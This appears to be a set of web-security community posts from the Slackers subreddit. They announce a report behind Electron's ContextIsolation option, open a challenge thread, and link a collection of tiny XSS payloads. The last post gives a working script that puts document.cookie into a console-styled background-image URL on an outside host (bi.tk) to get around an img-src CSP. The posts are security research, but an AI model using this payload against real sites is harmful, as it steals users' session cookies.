As the report is finally public, you can read about the discoveries, which lead to the Electron Framework adding the ContextIsolation option.

All the credits belong to masato :)

https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view

Grrrr reddit archive posts after 6 months (even if sticky) so here is a new challenge thread. To post a challenge please follow the following format

Creator:

Challenge:

Solution:

Rules:

The old challenge thread is available here:

https://www.reddit.com/r/Slackers/comments/ebcg8z/the_challenge_thread/

Recently I created a repo to collect all cool, but tiny, XSS payloads that I knew of.

https://github.com/terjanq/Tiny-XSS-Payloads

Please contribute if you know of any other cool tricks you can do, or if you know about authors of payloads already included there https://github.com/terjanq/Tiny-XSS-Payloads/blob/master/payloads.js

While trying weird stuff on the sandbox made by /u/garethheyes/ I found a way to bypass img-src when the console is open.
In chrome you can add css style to your console output, and the console support background-image.

So you can use this feature to exfiltrate some data with a strict CSP.

<script>
console.log("%cHello", `background: url("//bi.tk/${document.cookie}`)
</script>

But this only trigger when the console is open.